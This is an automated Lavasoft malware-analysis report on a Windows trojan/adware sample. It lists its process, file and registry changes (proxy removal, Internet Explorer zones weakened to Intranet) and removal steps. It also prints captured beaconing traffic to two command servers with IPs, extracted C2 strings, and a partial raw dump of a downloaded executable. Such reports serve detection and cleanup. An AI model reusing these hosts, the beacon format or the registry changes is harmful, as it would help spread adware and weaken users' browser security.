not-a-virus:AdWare.Win32.ConvertAd.awxy (Kaspersky), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: f9ebaab3623a46eea24892cb54389778
SHA1: b17cb85bfa75ccfd92f4e0eb47deb0d5bacf78b4
SHA256: 01da0ce718aadf7ca409f2796f146ad7673593ce5d85111a39d6fae1620fe0eb
SSDeep: 6144:6YfyYa3oozreDCACaOoa4SwCZo2Qiv GKpqPMN vnoL:LyYxozqmACaOJ4HCkqMN k
Size: 299520 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-03-30 04:22:37
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
dwwin.exe:304
%original file name%.exe:580
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:
ShimCacheMutexZonesLockedCacheCounterMutexZonesCounterMutexZonesCacheCounterMutexRasPbFileWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_
File activity
The process dwwin.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\7F74E.dmp (109504 bytes)
The process %original file name%.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%WinDir%\Temp\1.tmp.exe (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f420_appcompat.txt (6214 bytes)
Registry activity
The process dwwin.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C C2 3E BA F5 1D 8D DE 7E E8 83 0B 3C 04 43 F1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C C0 2B 3C F9 B4 99 F3 37 18 05 48 23 C4 3C 91"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
dwwin.exe:304
%original file name%.exe:580 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\7F74E.dmp (109504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%WinDir%\Temp\1.tmp.exe (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f420_appcompat.txt (6214 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 223823 | 224256 | 4.49086 | af6d1d07ea6dd24a68328dd6cf3afc83 |
.rdata | 229376 | 50666 | 50688 | 3.48212 | 16bd96038bb455fec443b5caa8f4a38a |
.data | 282624 | 17656 | 8704 | 3.21315 | d8e3ab1c7ae630f53b541d9dd94eb50c |
.rsrc | 303104 | 848 | 1024 | 3.8074 | 2f0a8c4da2bf99bf11bc35e76db0b38e |
.reloc | 307200 | 13646 | 13824 | 3.87773 | 0a3385fed18696464f7957811fd02bc6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://events.datahouse-us.com/Um7UdXgzvHWLL7R | 52.86.227.248 |
hxxp://livestatscounter.com/SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b | 50.7.86.58 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /Um7UdXgzvHWLL7R HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 215
Cache-Control: no-cache
{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"1726\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Sun, 03 Apr 2016 17:17:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}HTTP/1.1 200 OK..Server: openresty/1.9.7.3..Date: Sun, 03 Apr 2016 17:17:22 GMT..Content-Type: application/json; charset=utf-8..Content-Length: 15..Connection: keep-alive..Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE..Access-Control-Allow-Origin: *..{"Status":"OK"}....
POST /Um7UdXgzvHWLL7R HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 215
Cache-Control: no-cache
{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"5981\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Sun, 03 Apr 2016 17:17:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}....
POST /Um7UdXgzvHWLL7R HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 215
Cache-Control: no-cache
{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"5729\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Sun, 03 Apr 2016 17:17:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}....
POST /Um7UdXgzvHWLL7R HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 215
Cache-Control: no-cache
{"data":"{\"channel_id\":\"NOCHPC\",\"event_event_id\":\"5729\",\"utm_addition\":\"src=cgen&v=7\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"offer_id\":\"\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Sun, 03 Apr 2016 17:17:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}HTTP/1.1 200 OK..Server: openresty/1.9.7.3..Date: Sun, 03 Apr 2016 17:17:23 GMT..Content-Type: application/json; charset=utf-8..Content-Length: 15..Connection: keep-alive..Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE..Access-Control-Allow-Origin: *..{"Status":"OK"}..
GET /SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Sun, 03 Apr 2016 17:16:43 GMT
Content-Type: application/octet-stream
Content-Length: 154218
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=lA5M2
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................... ............@.................................@................................`.......................................................................................text....r.......t.................. ..`.rdata..n .......,...x..............@..@.data.... ..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_580:
.text
.text
`.rdata
`.rdata
.data
.data
.rsrc
.rsrc
@.reloc
@.reloc
FTPWj
FTPWj
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
portuguese-brazilian
portuguese-brazilian
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
operator
operator
GetProcessWindowStation
GetProcessWindowStation
2nlDP2i6OrSdDSwRegOpenKeyExW
2nlDP2i6OrSdDSwRegOpenKeyExW
2nlDP2i6OrSdDSwRegCloseKey
2nlDP2i6OrSdDSwRegCloseKey
Offer.cpp
Offer.cpp
OfferList.cpp
OfferList.cpp
thread_pool.cpp
thread_pool.cpp
2nlDP2i6OrSdDSwWinHttpCrackUrl
2nlDP2i6OrSdDSwWinHttpCrackUrl
2nlDP2i6OrSdDSwHttpSendRequestW
2nlDP2i6OrSdDSwHttpSendRequestW
2nlDP2i6OrSdDSwHttpOpenRequestW
2nlDP2i6OrSdDSwHttpOpenRequestW
CRYPT32.dll
CRYPT32.dll
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x6db97ddc@3constants@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x6db97ddc@3constants@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xd8c8bf65@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xd8c8bf65@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0xaea00e50@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@postcheck@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@postcheck@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@postcheck@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@postcheck@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@precheck@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V@?A0x411d9e21@precheck@@@tr1@std@@
zcÃ
zcÃ
0 0$0(0,0
0 0$0(0,0
6 6(60686
6 6(60686
> >$>,>@>`>
> >$>,>@>`>
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
KERNEL32.DLL
KERNEL32.DLL
WUSER32.DLL
WUSER32.DLL
2nlDP2i6OrSdDSwShlwapi.dll
2nlDP2i6OrSdDSwShlwapi.dll
2nlDP2i6OrSdDSwhttp
2nlDP2i6OrSdDSwhttp
2nlDP2i6OrSdDSwchrome
2nlDP2i6OrSdDSwchrome
2nlDP2i6OrSdDSwfirefox
2nlDP2i6OrSdDSwfirefox
W2nlDP2i6OrSdDSwAdvapi32.dll
W2nlDP2i6OrSdDSwAdvapi32.dll
2nlDP2i6OrSdDSwSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
2nlDP2i6OrSdDSwSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
2nlDP2i6OrSdDSwmscoree.dll
2nlDP2i6OrSdDSwmscoree.dll
2nlDP2i6OrSdDSwv1.0.3705
2nlDP2i6OrSdDSwv1.0.3705
2nlDP2i6OrSdDSwKernel32.dll
2nlDP2i6OrSdDSwKernel32.dll
2nlDP2i6OrSdDSwSoftware\Microsoft\.NETFramework\Policy\v1.0
2nlDP2i6OrSdDSwSoftware\Microsoft\.NETFramework\Policy\v1.0
2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v1.1.4322
2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v1.1.4322
2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v2.0.50727
2nlDP2i6OrSdDSwSoftware\Microsoft\NET Framework Setup\NDP\v2.0.50727
2nlDP2i6OrSdDSwv1.1.4322
2nlDP2i6OrSdDSwv1.1.4322
2nlDP2i6OrSdDSwv2.0.50727
2nlDP2i6OrSdDSwv2.0.50727
2nlDP2i6OrSdDSwv4.0.30319
2nlDP2i6OrSdDSwv4.0.30319
2nlDP2i6OrSdDSwcmd_args
2nlDP2i6OrSdDSwcmd_args
2nlDP2i6OrSdDSwexe_link
2nlDP2i6OrSdDSwexe_link
2nlDP2i6OrSdDSwreg_keys
2nlDP2i6OrSdDSwreg_keys
2nlDP2i6OrSdDSwreg_keys_post
2nlDP2i6OrSdDSwreg_keys_post
2nlDP2i6OrSdDSwreg_key
2nlDP2i6OrSdDSwreg_key
Kernel32.dll
Kernel32.dll
2nlDP2i6OrSdDSw?url=
2nlDP2i6OrSdDSw?url=
e.exe
e.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\CleanBrowser
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\CleanBrowser
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\ContentPush
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\ContentPush
hXXp://livestatscounter.com/SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b
hXXp://livestatscounter.com/SysInfo/cb6w.php?guid=b7d5e1e116202c90a3039f92095f0b0b
2nlDP2i6OrSdDSwSoftware\Microsoft\Windows\CurrentVersion\RunOnce
2nlDP2i6OrSdDSwSoftware\Microsoft\Windows\CurrentVersion\RunOnce
2nlDP2i6OrSdDSwhXXps://livestatscounter.com/Generic/sys/lst.php
2nlDP2i6OrSdDSwhXXps://livestatscounter.com/Generic/sys/lst.php
2nlDP2i6OrSdDSwHKEY_LOCAL_MACHINE
2nlDP2i6OrSdDSwHKEY_LOCAL_MACHINE
2nlDP2i6OrSdDSwHKEY_CURRENT_USER
2nlDP2i6OrSdDSwHKEY_CURRENT_USER
2nlDP2i6OrSdDSwWinhttp.dll
2nlDP2i6OrSdDSwWinhttp.dll
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
2nlDP2i6OrSdDSwWininet.dll
2nlDP2i6OrSdDSwWininet.dll
2nlDP2i6OrSdDSwWinInet.dll
2nlDP2i6OrSdDSwWinInet.dll
2nlDP2i6OrSdDSwContent-Type: application/x-www-form-urlencoded
2nlDP2i6OrSdDSwContent-Type: application/x-www-form-urlencoded
2nlDP2i6OrSdDSw{"data":"{\"channel_id\":\"%s\",\"event_event_id\":\"%d\",\"utm_addition\":\"%s\",\"guid\":\"%s\",\"offer_id\":\"%s\",\"browser_name\":\"\"}","table":"event_has_user"}
2nlDP2i6OrSdDSw{"data":"{\"channel_id\":\"%s\",\"event_event_id\":\"%d\",\"utm_addition\":\"%s\",\"guid\":\"%s\",\"offer_id\":\"%s\",\"browser_name\":\"\"}","table":"event_has_user"}
2nlDP2i6OrSdDSwhXXp://events.datahouse-us.com/Um7UdXgzvHWLL7R
2nlDP2i6OrSdDSwhXXp://events.datahouse-us.com/Um7UdXgzvHWLL7R
c:\%original file name%.exe
c:\%original file name%.exe